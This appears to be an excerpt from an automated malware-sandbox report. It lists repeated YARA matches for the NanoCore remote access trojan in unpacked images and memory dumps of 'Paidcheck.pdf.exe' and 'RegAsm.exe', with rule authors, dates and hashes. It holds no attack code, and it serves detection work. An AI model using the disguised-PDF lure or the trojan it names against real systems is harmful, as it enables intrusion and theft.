      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
